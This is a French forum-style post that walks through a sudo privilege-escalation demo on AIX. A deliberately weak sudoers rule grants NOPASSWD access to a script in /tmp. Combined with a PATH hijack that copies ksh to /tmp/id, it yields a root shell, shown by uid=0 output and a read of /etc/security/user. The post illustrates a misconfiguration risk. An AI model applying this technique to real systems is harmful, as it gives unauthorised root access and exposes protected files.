Voici la démonstration faite par mon collègue Nico K.
Il m'aide beaucoup et est un excellent AIXien pour ne pas dire linuxien
Encore merci à toi Nicolas

Donc voici la démo incroyable sous AIX 6100-05

il suffit de lire le fichiers sudoers et de voir si il n'y a pas un accès a un script que l'on peu transformer !!! ça c une autre histoire de droit

(pour l'exemple je vais faire gros et stupide mais ce n'est que pour la demo que vous pouvez reproduire)

sous root
entrez dans le sudoers # visudo
entrez la ligne suivante #

kalwin ALL = NOPASSWD: /tmp/kalw.ksh

enregistrez

déloguez vous et loguez vous sous kalwin (c'est un exemple le user kalwin )

et faite les commande suivante

/home/kalwin # cp /usr/bin/ksh /tmp/id

/home/kalwin # vi /tmp/kalw.ksh
#!/usr/bin/ksh
id

/home/kalwin # chmod u+x /tmp/kalw.ksh

/home/kalwin # export PATH=.:$PATH

/home/kalwin # cd /tmp

/tmp # sudo /tmp/kalw.ksh

/tmp # /usr/bin/id
uid=0(root) gid=0(system) groups=2(bin),3(sys),7(security),8(cron),10(audit),11(lp)

Vous voici en login root sous votre user

vous pouvez ouvrir tous les fichiers vous êtes root

/home/kalwin # cat /etc/security/user

*******************************************************************************
* VALID USER ATTRIBUTES FOR /ETC/SECURITY/USER:
*
* account_locked Defines whether the account is locked. Locked accounts can
* not be used for login. Possible values: true or false.
*
* admin Defines the administrative status of the user.



ça fonctionne

Voici

Encore Merci Nico